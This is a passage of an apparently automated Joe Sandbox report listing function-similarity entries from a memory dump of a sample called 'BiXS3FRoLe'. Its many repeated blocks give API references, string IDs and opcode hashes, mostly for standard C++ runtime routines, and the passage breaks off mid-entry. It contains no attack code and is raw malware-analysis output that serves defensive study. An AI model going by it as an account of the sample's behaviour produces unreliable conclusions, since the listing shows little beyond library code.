                                                                                                         • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                        • String ID:
                                                                                                        • API String ID: 161543041-0
                                                                                                        • Opcode ID: e522930302b4c172d97c8d8265c8807d133ed583d29b623727b113237f4a7131
                                                                                                        • Instruction ID: 308840a702250b049491b4c138d2f6a940c6668a0839bd5fd2e0a42bc5429306
                                                                                                        • Opcode Fuzzy Hash: e522930302b4c172d97c8d8265c8807d133ed583d29b623727b113237f4a7131
                                                                                                        • Instruction Fuzzy Hash: B7314D71A00701AFEB31AA38E845B56B7E8EF41750F7548AAE058D7161EF75FD40CB20
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                         • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID:
                                                                                                        • API String ID: 269201875-0
                                                                                                        • Opcode ID: 9a636746aca7a7735d22caa6d3980cd449850805908c40474791cf9cf04b8279
                                                                                                        • Instruction ID: 27de5441149c838930e24375bb1cbdc3b6251a71d135274057426c5039119b79
                                                                                                        • Opcode Fuzzy Hash: 9a636746aca7a7735d22caa6d3980cd449850805908c40474791cf9cf04b8279
                                                                                                        • Instruction Fuzzy Hash: E4C126B2D40205BBDB20DBA8DC82FDE77F8AF45710F2441A5FA45FB282D670AE418755
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                         • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Maklocchr$GetcvtMaklocstr$GetvalsH_prolog3_
                                                                                                        • String ID: false$true
                                                                                                        • API String ID: 2593140031-2658103896
                                                                                                        • Opcode ID: 920de3c1debbacfaa8f5a3d18969668429b2be8b756def944e92fe36a6e2c16b
                                                                                                        • Instruction ID: 0592cba98f8db4711e1c9bd6f94ef11aa05c9e3382963095a74d9895d89da44b
                                                                                                        • Opcode Fuzzy Hash: 920de3c1debbacfaa8f5a3d18969668429b2be8b756def944e92fe36a6e2c16b
                                                                                                        • Instruction Fuzzy Hash: 862192B2D00348AADF14EFA5D885ADF7BB8EF14710F048456F9199F242EB709944CBE1
                                                                                                        APIs
                                                                                                        • IsInExceptionSpec.LIBVCRUNTIME ref: 00B1A6D1
                                                                                                        • ___TypeMatch.LIBVCRUNTIME ref: 00B1A803
                                                                                                        • IsInExceptionSpec.LIBVCRUNTIME ref: 00B1A8CD
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B1A92B
                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 00B1A94F
                                                                                                        • CallUnexpected.LIBVCRUNTIME ref: 00B1A96A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                         • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionSpec$CallException@8FramesMatchNestedThrowTypeUnexpectedUnwind
                                                                                                        • String ID: csm$csm$csm
                                                                                                        • API String ID: 2291861386-393685449
                                                                                                        • Opcode ID: 40d2157cd318c55b326ce881c26910789badc758616dbba4f76e614181c5ea8b
                                                                                                        • Instruction ID: f6e89644befcf27d04650353a481a490dda2238d8c46dd1d9be0680edc5eabec
                                                                                                        • Opcode Fuzzy Hash: 40d2157cd318c55b326ce881c26910789badc758616dbba4f76e614181c5ea8b
                                                                                                        • Instruction Fuzzy Hash: 4BB149718012099FCF25DFA4C8819EEBBF9FF18310F95419AE8156B251D731EAD2CB92
                                                                                                        APIs
                                                                                                          • Part of subcall function 00AD0AE0: ___std_type_info_name.LIBVCRUNTIME ref: 00AD0B9E
                                                                                                          • Part of subcall function 00AD0AE0: ___std_type_info_name.LIBVCRUNTIME ref: 00AD0C09
                                                                                                        • ___std_type_info_name.LIBVCRUNTIME ref: 00AD27C4
                                                                                                          • Part of subcall function 00B17BC4: ___unDName.LIBVCRUNTIME ref: 00B17BF0
                                                                                                        • ___std_type_info_name.LIBVCRUNTIME ref: 00AD282E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                         • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___std_type_info_name$Name___un
                                                                                                        • String ID: ModPrime1PrivateExponent$ModPrime2PrivateExponent$MultiplicativeInverseOfPrime2ModPrime1$Prime1$Prime2$PrivateExponent$ThisObject:
                                                                                                        • API String ID: 3683324773-4091968653
                                                                                                        • Opcode ID: 7d7228c8bd92c612d66a871353d1c2eacf5864c2e47b0e027daf64813759030d
                                                                                                        • Instruction ID: e9ba5194f8edb25d9e4a0917ad8ad788cac1b5a70aac8f45d15e0252eaf84974
                                                                                                        • Opcode Fuzzy Hash: 7d7228c8bd92c612d66a871353d1c2eacf5864c2e47b0e027daf64813759030d
                                                                                                        • Instruction Fuzzy Hash: D761D371604741AFC711AF34C95AB9BBBF4AF91300F004A6AF4965B3A1EB71D908CB92
                                                                                                        APIs
                                                                                                        • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00B0A05B
                                                                                                        • SwitchToThread.KERNEL32(?), ref: 00B0A07E
                                                                                                        • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00B0A09D
                                                                                                        • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 00B0A0B9
                                                                                                        • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00B0A0C4
                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00B0A0EB
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B0A0F9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                         • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextException@8InternalMarkOversubscribedProcProcessor::ResetRetirementSwitchThreadThrowstd::invalid_argument::invalid_argument
                                                                                                        • String ID: count$ppVirtualProcessorRoots
                                                                                                        • API String ID: 3409498682-3650809737
                                                                                                        • Opcode ID: 0f5bd9df816f843b85494532a0fca665e0066f91056e179403c704b5b6c047a9
                                                                                                        • Instruction ID: 99416cdb4ac70ba40d487f8313b2a6d97274838befd58bc4cfd2301e70e54413
                                                                                                        • Opcode Fuzzy Hash: 0f5bd9df816f843b85494532a0fca665e0066f91056e179403c704b5b6c047a9
                                                                                                        • Instruction Fuzzy Hash: 3C214F35A00309AFCB14EFA5C485AADBBF5FF49354F4044E9E902AB391DB30AE45CB51
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                         • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: GetcvtMaklocchrMaklocstr$H_prolog3_
                                                                                                        • String ID: false$true
                                                                                                        • API String ID: 2216850052-2658103896
                                                                                                        • Opcode ID: 60ee497a4417e33ef676386ab07dedb29546e57c5c3b809f51d914e10fe623df
                                                                                                        • Instruction ID: 2fcb48075648da7cf2cf29513af08e37f05cecdebdda2fac0d55788f7aa3a336
                                                                                                        • Opcode Fuzzy Hash: 60ee497a4417e33ef676386ab07dedb29546e57c5c3b809f51d914e10fe623df
                                                                                                        • Instruction Fuzzy Hash: 672162B5D00348AADB14EFA6D98599FBBF8EF54700F00849AF9159F252EB70E540CB61
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00B09AE1
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00B09AE9
                                                                                                        • DuplicateHandle.KERNEL32(00000000,000000FF,00000000,00000000,00000000,00000000,00000002), ref: 00B09AFE
                                                                                                        • SafeRWList.LIBCONCRT ref: 00B09B1E
                                                                                                          • Part of subcall function 00B07B1E: __EH_prolog3.LIBCMT ref: 00B07B25
                                                                                                          • Part of subcall function 00B07B1E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00B07B2F
                                                                                                          • Part of subcall function 00B07B1E: List.LIBCMT ref: 00B07B39
                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00B09B30
                                                                                                        • GetLastError.KERNEL32 ref: 00B09B3F
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00B09B55
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B09B63
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                         • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8H_prolog3HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                                                                        • String ID: eventObject
                                                                                                        • API String ID: 3870774015-1680012138
                                                                                                        • Opcode ID: baa875eeed0c72bcd748cb66238be0836b2df0020c4caacafa4ec2eead97a326
                                                                                                        • Instruction ID: c4ae535a1fae88588ec99a03fce6a5c5b435ea5fe4e232cff2f409422566ea89
                                                                                                        • Opcode Fuzzy Hash: baa875eeed0c72bcd748cb66238be0836b2df0020c4caacafa4ec2eead97a326
                                                                                                        • Instruction Fuzzy Hash: 4311A031A00305EBCB14EBA4DC4AFEE7BECAF04752F6041D4B505A61E2DF749A44C6A5
                                                                                                        APIs
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00B14AB8
                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,?,00B0896E,?,?,?,?,00000000,?,00000000), ref: 00B14ACA
                                                                                                        • GetCurrentThread.KERNEL32 ref: 00B14AD2
                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,?,00B0896E,?,?,?,?,00000000,?,00000000), ref: 00B14ADA
                                                                                                        • DuplicateHandle.KERNEL32(00000000,00000000,00000000,00B08A12,00000000,00000000,00000002,?,?,?,?,?,00B0896E,?,?,?), ref: 00B14AF3
                                                                                                        • Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 00B14B14
                                                                                                          • Part of subcall function 00B02DA4: ___crtCreateThreadpoolTimer.LIBCPMT ref: 00B02DB0
                                                                                                          • Part of subcall function 00B02DA4: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 00B02DBE
                                                                                                          • Part of subcall function 00B02DA4: ___crtSetThreadpoolWait.LIBCPMT ref: 00B02DD0
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00B0896E,?,?,?,?,00000000,?,00000000), ref: 00B14B26
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00B0896E,?,?,?,?,00000000,?,00000000), ref: 00B14B51
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00B14B67
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B14B75
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThreadThreadpoolWait___crt$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateDuplicateException@8HandleReferenceRegisterThrowTimer
                                                                                                        • String ID:
                                                                                                        • API String ID: 1073306966-0
                                                                                                        • Opcode ID: 5d17884c7a51d4d5e53aa07fe3cb35521eec08829d8fff9afe7e2a943a59a36a
                                                                                                        • Instruction ID: 4dc21e4c1a91f12fc5cecb923fb24f51660ffc4ad9eb76461abe31e879040f0e
                                                                                                        • Opcode Fuzzy Hash: 5d17884c7a51d4d5e53aa07fe3cb35521eec08829d8fff9afe7e2a943a59a36a
                                                                                                        • Instruction Fuzzy Hash: 6611AE71648300ABD710AB749C8AFDB7AE89F05741F4804F4FA45EB2A2EB70C9448BA5
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 00B3429A
                                                                                                          • Part of subcall function 00B34D66: RtlFreeHeap.NTDLL(00000000,00000000,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?), ref: 00B34D7C
                                                                                                          • Part of subcall function 00B34D66: GetLastError.KERNEL32(?,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?,?), ref: 00B34D8E
                                                                                                        • _free.LIBCMT ref: 00B342A6
                                                                                                        • _free.LIBCMT ref: 00B342B1
                                                                                                        • _free.LIBCMT ref: 00B342BC
                                                                                                        • _free.LIBCMT ref: 00B342C7
                                                                                                        • _free.LIBCMT ref: 00B342D2
                                                                                                        • _free.LIBCMT ref: 00B342DD
                                                                                                        • _free.LIBCMT ref: 00B342E8
                                                                                                        • _free.LIBCMT ref: 00B342F3
                                                                                                        • _free.LIBCMT ref: 00B34301
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: ab1fe9de1a942be2ed3440510aa65529fcdba961c2d5651d42da1b60664064e5
                                                                                                        • Instruction ID: 1a9118a485f4dab721adeb9067dc1b7063a04604505a78c383a6185a723496d1
                                                                                                        • Opcode Fuzzy Hash: ab1fe9de1a942be2ed3440510aa65529fcdba961c2d5651d42da1b60664064e5
                                                                                                        • Instruction Fuzzy Hash: D4117276510108BFCB11EF94C982DD93BA5EF45750FA141E6BA088F232EB35EF509B80
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00AF55D2
                                                                                                          • Part of subcall function 00AAC470: std::_Lockit::_Lockit.LIBCPMT ref: 00AAC4BC
                                                                                                          • Part of subcall function 00AAC470: std::_Lockit::_Lockit.LIBCPMT ref: 00AAC4DE
                                                                                                          • Part of subcall function 00AAC470: std::_Lockit::~_Lockit.LIBCPMT ref: 00AAC4FE
                                                                                                          • Part of subcall function 00AAC470: std::_Lockit::~_Lockit.LIBCPMT ref: 00AAC5FC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                        • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                        • API String ID: 1383202999-2891247106
                                                                                                        • Opcode ID: 4591b9aec752c66bf9bc8342499b6e4d14530fb2366dd508b365faba091d01a6
                                                                                                        • Instruction ID: ca5488f7b3d4e00fc3d7af38141a0a281228c18b76b9af50d9daafa3cc01ad18
                                                                                                        • Opcode Fuzzy Hash: 4591b9aec752c66bf9bc8342499b6e4d14530fb2366dd508b365faba091d01a6
                                                                                                        • Instruction Fuzzy Hash: 31B1A97590020EAFDF05CFA4CC92EFE7BB9EF08344F104449FB55A62A2DA319A51DB60
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00AF522D
                                                                                                          • Part of subcall function 00AEB22F: __EH_prolog3.LIBCMT ref: 00AEB236
                                                                                                          • Part of subcall function 00AEB22F: std::_Lockit::_Lockit.LIBCPMT ref: 00AEB240
                                                                                                          • Part of subcall function 00AEB22F: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEB2B1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                                                                                                        • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                        • API String ID: 1538362411-2891247106
                                                                                                        • Opcode ID: 60da6e1fa7d3f88a479489b11390f3ba705da5b7a67a54a0398a032daf5bdd7b
                                                                                                        • Instruction ID: 642af802758958e2522a30d5f7dbd7738b614d8d6753615fffa9591fd069cd6c
                                                                                                        • Opcode Fuzzy Hash: 60da6e1fa7d3f88a479489b11390f3ba705da5b7a67a54a0398a032daf5bdd7b
                                                                                                        • Instruction Fuzzy Hash: 7EA115B190060EAFDF05DFA4CD52EFE7BBAEF08304F10455AFB56A6291D6319A109B60
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00AFA898
                                                                                                          • Part of subcall function 00AA8DC0: std::_Lockit::_Lockit.LIBCPMT ref: 00AA8E09
                                                                                                          • Part of subcall function 00AA8DC0: std::_Lockit::_Lockit.LIBCPMT ref: 00AA8E2B
                                                                                                          • Part of subcall function 00AA8DC0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AA8E4B
                                                                                                          • Part of subcall function 00AA8DC0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AA8F18
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                        • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                        • API String ID: 1383202999-2891247106
                                                                                                        • Opcode ID: 6aa7a2e94a6991a75cf54f1e2b74d0f8186cf4cdba145a66ba1a47ec6036c74e
                                                                                                        • Instruction ID: 03581f5cb20bbddcef14f3d6485e4bfdd089ba44e4625e810f19e3dffe87b473
                                                                                                        • Opcode Fuzzy Hash: 6aa7a2e94a6991a75cf54f1e2b74d0f8186cf4cdba145a66ba1a47ec6036c74e
                                                                                                        • Instruction Fuzzy Hash: 2FA18AB150020EEFDF05DF94CD82EFE7BBAEF18304F10445AFA4AA6291D6718950DB62
                                                                                                        APIs
                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00AE4DAA
                                                                                                        • GetLastError.KERNEL32(0000000A), ref: 00AE4DD5
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AE4E16
                                                                                                        Strings
                                                                                                        • Timer: QueryPerformanceCounter failed with error , xrefs: 00AE4DF0
                                                                                                        • Timer: QueryPerformanceFrequency failed with error , xrefs: 00AE4EDB
                                                                                                        Memory Dump Source
